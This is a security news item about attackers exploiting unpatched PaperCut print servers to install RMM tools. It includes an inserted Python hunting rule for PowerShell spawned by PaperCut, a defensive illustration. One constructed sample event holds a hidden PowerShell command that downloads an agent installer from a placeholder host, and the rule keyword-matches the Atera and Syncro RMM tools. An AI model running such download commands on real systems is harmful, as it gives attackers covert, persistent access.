Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers (Security News, April 2023)
Print management software provider PaperCut said that it has "evidence to suggest that unpatched servers are being exploited in the wild," citing two vulnerability reports from cybersecurity company Trend Micro.
"PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC," it further added.
Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from the PaperCut software to install remote management and maintenance (RMM) tools such as Atera and Syncro, giving the attackers persistent access and code execution on the infected hosts. Huntress warned: "Potentially, the access gained through PaperCut exploitation could be used as a foothold leading to follow-on movement within the victim network, and ultimately ransomware deployment."
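The observation above (PowerShell spawned by the PaperCut server process, then RMM agents being installed) is a process-ancestry pattern that defenders can hunt for in EDR or Sysmon process-creation telemetry. The following is an added illustration written for this page, not code from PaperCut, Huntress or the article; the event records are constructed, and the PaperCut install path and `pc-app.exe` process name in them are assumptions used only so the sample has something to match on. The detector flags any PowerShell child of a PaperCut-looking parent and raises the severity when the command line references one of the RMM tools named in the report.

```python
import ntpath
from typing import Dict, List, Optional

# RMM tools named in the report; a command line mentioning one of them
# turns a suspicious PowerShell spawn into a high-severity finding.
RMM_KEYWORDS = ("atera", "syncro")

# Child images we treat as PowerShell (Windows PowerShell and PowerShell 7).
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Constructed process-creation events (not real telemetry). The parent path
# and process name "pc-app.exe" are assumptions made for this illustration.
PAPERCUT_PARENT = r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # PaperCut spawning PowerShell that fetches an RMM installer -> high
        "host": "printsrv01",
        "parent_image": PAPERCUT_PARENT,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -w hidden -c "Invoke-WebRequest '
                        'http://example.invalid/atera_agent.msi -OutFile $env:TEMP\\agent.msi"',
    },
    {   # PaperCut spawning its own Java runtime -> expected, not flagged
        "host": "printsrv01",
        "parent_image": PAPERCUT_PARENT,
        "image": r"C:\Program Files\PaperCut MF\runtime\jre\bin\java.exe",
        "command_line": "java.exe -server -Xmx1024m ...",
    },
    {   # An admin running PowerShell from Explorer -> unrelated parent, not flagged
        "host": "ws-17",
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe Get-Process",
    },
    {   # PaperCut spawning PowerShell with no RMM reference -> still medium
        "host": "printsrv02",
        "parent_image": PAPERCUT_PARENT,
        "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "command_line": "pwsh.exe -c Set-ExecutionPolicy Bypass -Scope Process",
    },
]


def is_papercut_parent(parent_image: str) -> bool:
    """Match on the vendor name in the parent path rather than an exact
    executable, so the rule survives version or install-location changes."""
    return "papercut" in parent_image.lower()


def classify_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a PowerShell child of a PaperCut parent, else None."""
    child = ntpath.basename(event["image"]).lower()
    if child not in POWERSHELL_IMAGES or not is_papercut_parent(event["parent_image"]):
        return None
    cmd = event.get("command_line", "")
    rmm_tools = [k for k in RMM_KEYWORDS if k in cmd.lower()]
    return {
        "host": event["host"],
        "severity": "high" if rmm_tools else "medium",
        "rmm_tools": rmm_tools,
        "command_line": cmd,
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the rule over a batch of events, preserving event order."""
    return [f for f in (classify_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['severity'].upper()}] {finding['host']}: "
              f"rmm={finding['rmm_tools'] or '-'} cmd={finding['command_line']}")
```

The medium-severity branch matters: a print server has little legitimate reason to launch PowerShell from its application process at all, so the parent/child relationship alone is worth an alert even before an RMM installer shows up in the command line.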
Users are advised to upgrade to the fixed versions of PaperCut MF and NG as soon as possible, regardless of whether the server is "available to external or internal connections," to mitigate the risk.
Customers who cannot apply the security patch are advised to lock down network access to the servers by blocking all inbound traffic from external IP addresses and restricting inbound connections to the IP addresses of verified site servers only.
News URL: https://thehackernews.com/2023/04/russian-hackers-suspected-in-ongoing.html
Related news
- US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers
- Russian security firm Dr.Web disconnects all servers after breach
- Microsoft and DOJ disrupt Russian FSB hackers' attack infrastructure
- 100+ domains seized to stymie Russian Star Blizzard hackers
- Pro-Ukrainian Hackers Strike Russian State TV on Putin's Birthday
- CISA: Hackers abuse F5 BIG-IP cookies to map internal servers
- Russian hackers deliver malicious RDP configuration files to thousands
- Hackers increasingly use Winos4.0 post-exploitation kit in attacks